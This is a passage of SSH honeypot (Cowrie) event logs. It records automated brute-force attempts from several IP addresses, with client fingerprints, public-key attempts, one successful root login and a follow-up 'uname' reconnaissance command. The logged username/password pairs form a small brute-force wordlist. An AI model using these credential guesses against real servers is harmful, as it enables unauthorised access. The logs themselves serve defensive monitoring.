rt-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:50:59.274117Z","src_ip":"51.79.164.132","session":"30007022df1e"}
{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:51:00.913908Z","src_ip":"51.79.164.132","session":"30007022df1e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:51:02.040098Z","src_ip":"51.79.164.132","session":"30007022df1e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:51:02.041090Z","src_ip":"51.79.164.132","session":"30007022df1e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:51:02.389885Z","src_ip":"51.79.164.132","session":"30007022df1e"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:51:02.391695Z","src_ip":"51.79.164.132","session":"30007022df1e"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":55492,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b867c0ac7f6","protocol":"ssh","message":"New connection: 185.93.89.7:55492 (1.2.3.4:22) [session: 2b867c0ac7f6]","sensor":"my-vps","timestamp":"2025-08-28T09:51:14.453769Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:51:14.482819Z","src_ip":"185.93.89.7","session":"2b867c0ac7f6"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:51:14.483505Z","src_ip":"185.93.89.7","session":"2b867c0ac7f6"}
{"eventid":"cowrie.login.failed","username":"index","password":"zzzzzz","message":"login attempt [index/zzzzzz] failed","sensor":"my-vps","timestamp":"2025-08-28T09:51:14.579273Z","src_ip":"185.93.89.7","session":"2b867c0ac7f6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:51:15.606032Z","src_ip":"185.93.89.7","session":"2b867c0ac7f6"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":54626,"dst_ip":"1.2.3.4","dst_port":22,"session":"0398beb6437e","protocol":"ssh","message":"New connection: 51.79.164.132:54626 (1.2.3.4:22) [session: 0398beb6437e]","sensor":"my-vps","timestamp":"2025-08-28T09:51:24.887649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:51:25.181317Z","src_ip":"51.79.164.132","session":"0398beb6437e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:51:25.182058Z","src_ip":"51.79.164.132","session":"0398beb6437e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:51:26.224749Z","src_ip":"79.124.8.120","session":"66e848b16f16"}
{"eventid":"cowrie.session.closed","duration":180.5316300392151,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:51:26.229400Z","src_ip":"79.124.8.120","session":"66e848b16f16"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker123","message":"login attempt [worker/worker123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:51:27.962194Z","src_ip":"51.79.164.132","session":"0398beb6437e"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:51:29.195517Z","src_ip":"51.79.164.132","session":"0398beb6437e"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":45038,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d1c354a72e0","protocol":"ssh","message":"New connection: 185.93.89.7:45038 (1.2.3.4:22) [session: 1d1c354a72e0]","sensor":"my-vps","timestamp":"2025-08-28T09:51:38.352952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:51:38.466936Z","src_ip":"185.93.89.7","session":"1d1c354a72e0"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:51:38.467664Z","src_ip":"185.93.89.7","session":"1d1c354a72e0"}
{"eventid":"cowrie.login.failed","username":"index","password":"password123","message":"login attempt [index/password123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:51:38.900106Z","src_ip":"185.93.89.7","session":"1d1c354a72e0"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:51:39.944454Z","src_ip":"185.93.89.7","session":"1d1c354a72e0"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":33696,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd3a7faed9e5","protocol":"ssh","message":"New connection: 51.79.164.132:33696 (1.2.3.4:22) [session: cd3a7faed9e5]","sensor":"my-vps","timestamp":"2025-08-28T09:51:51.416230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:51:51.664154Z","src_ip":"51.79.164.132","session":"cd3a7faed9e5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:51:51.664993Z","src_ip":"51.79.164.132","session":"cd3a7faed9e5"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser123","message":"login attempt [ftpuser/ftpuser123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:51:55.399063Z","src_ip":"51.79.164.132","session":"cd3a7faed9e5"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:51:56.979463Z","src_ip":"51.79.164.132","session":"cd3a7faed9e5"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":42506,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8b678e53b11","protocol":"ssh","message":"New connection: 185.93.89.7:42506 (1.2.3.4:22) [session: d8b678e53b11]","sensor":"my-vps","timestamp":"2025-08-28T09:52:01.824324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:52:01.826533Z","src_ip":"185.93.89.7","session":"d8b678e53b11"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:52:01.851150Z","src_ip":"185.93.89.7","session":"d8b678e53b11"}
{"eventid":"cowrie.login.failed","username":"index","password":"pass","message":"login attempt [index/pass] failed","sensor":"my-vps","timestamp":"2025-08-28T09:52:01.898806Z","src_ip":"185.93.89.7","session":"d8b678e53b11"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:52:02.919276Z","src_ip":"185.93.89.7","session":"d8b678e53b11"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":34420,"dst_ip":"1.2.3.4","dst_port":22,"session":"821e5f3ebd0a","protocol":"ssh","message":"New connection: 51.79.164.132:34420 (1.2.3.4:22) [session: 821e5f3ebd0a]","sensor":"my-vps","timestamp":"2025-08-28T09:52:17.889611Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35614,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f974a9e069a","protocol":"ssh","message":"New connection: 212.227.235.229:35614 (1.2.3.4:22) [session: 1f974a9e069a]","sensor":"my-vps","timestamp":"2025-08-28T09:52:18.041729Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:52:18.043583Z","src_ip":"212.227.235.229","session":"1f974a9e069a"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T09:52:18.131379Z","src_ip":"212.227.235.229","session":"1f974a9e069a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:52:18.184281Z","src_ip":"51.79.164.132","session":"821e5f3ebd0a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:52:18.185392Z","src_ip":"51.79.164.132","session":"821e5f3ebd0a"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"7f:46:35:de:8f:b8:50:41:c2:98:56:88:14:9d:de:63","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZxIBdBc2uDlfUcLD3eebhpM44db1H6ZJ4PINimz80gBG1x+2Z6lV4ZCiBAYQQz8sKVwT21Wq6p6LmYuvlyAeJdIjLNmL6EFPmSjMxezbstMpRRKlu4oIpwYRQ3WudJQ71Zjj3P+uBNt51jIJJ56QHL0+HfD5crEkXxYd9idKsp5vs9ZocMurYrebmC6iZ7ikJti0FRTXZEG0DWM35zhEXoteBJiX2652eSv31PHS/SzBa8y9EBAGe7ozbC2Fv+6We7OT/JY98Fs4CGdmRt+QsTaE5+v4Xc97iFoKsxvyZZFUEzpB08zd6B6zcnWMB5YqO3KQ5qqGfFxkDirvNCbbJ","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 7f:46:35:de:8f:b8:50:41:c2:98:56:88:14:9d:de:63","sensor":"my-vps","timestamp":"2025-08-28T09:52:18.310019Z","src_ip":"212.227.235.229","session":"1f974a9e069a"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"7f:46:35:de:8f:b8:50:41:c2:98:56:88:14:9d:de:63","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZxIBdBc2uDlfUcLD3eebhpM44db1H6ZJ4PINimz80gBG1x+2Z6lV4ZCiBAYQQz8sKVwT21Wq6p6LmYuvlyAeJdIjLNmL6EFPmSjMxezbstMpRRKlu4oIpwYRQ3WudJQ71Zjj3P+uBNt51jIJJ56QHL0+HfD5crEkXxYd9idKsp5vs9ZocMurYrebmC6iZ7ikJti0FRTXZEG0DWM35zhEXoteBJiX2652eSv31PHS/SzBa8y9EBAGe7ozbC2Fv+6We7OT/JY98Fs4CGdmRt+QsTaE5+v4Xc97iFoKsxvyZZFUEzpB08zd6B6zcnWMB5YqO3KQ5qqGfFxkDirvNCbbJ","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T09:52:18.310724Z","src_ip":"212.227.235.229","session":"1f974a9e069a"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"7f:46:35:de:8f:b8:50:41:c2:98:56:88:14:9d:de:63","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZxIBdBc2uDlfUcLD3eebhpM44db1H6ZJ4PINimz80gBG1x+2Z6lV4ZCiBAYQQz8sKVwT21Wq6p6LmYuvlyAeJdIjLNmL6EFPmSjMxezbstMpRRKlu4oIpwYRQ3WudJQ71Zjj3P+uBNt51jIJJ56QHL0+HfD5crEkXxYd9idKsp5vs9ZocMurYrebmC6iZ7ikJti0FRTXZEG0DWM35zhEXoteBJiX2652eSv31PHS/SzBa8y9EBAGe7ozbC2Fv+6We7OT/JY98Fs4CGdmRt+QsTaE5+v4Xc97iFoKsxvyZZFUEzpB08zd6B6zcnWMB5YqO3KQ5qqGfFxkDirvNCbbJ","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 7f:46:35:de:8f:b8:50:41:c2:98:56:88:14:9d:de:63","sensor":"my-vps","timestamp":"2025-08-28T09:52:18.399451Z","src_ip":"212.227.235.229","session":"1f974a9e069a"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"7f:46:35:de:8f:b8:50:41:c2:98:56:88:14:9d:de:63","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZxIBdBc2uDlfUcLD3eebhpM44db1H6ZJ4PINimz80gBG1x+2Z6lV4ZCiBAYQQz8sKVwT21Wq6p6LmYuvlyAeJdIjLNmL6EFPmSjMxezbstMpRRKlu4oIpwYRQ3WudJQ71Zjj3P+uBNt51jIJJ56QHL0+HfD5crEkXxYd9idKsp5vs9ZocMurYrebmC6iZ7ikJti0FRTXZEG0DWM35zhEXoteBJiX2652eSv31PHS/SzBa8y9EBAGe7ozbC2Fv+6We7OT/JY98Fs4CGdmRt+QsTaE5+v4Xc97iFoKsxvyZZFUEzpB08zd6B6zcnWMB5YqO3KQ5qqGfFxkDirvNCbbJ","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T09:52:18.400163Z","src_ip":"212.227.235.229","session":"1f974a9e069a"}
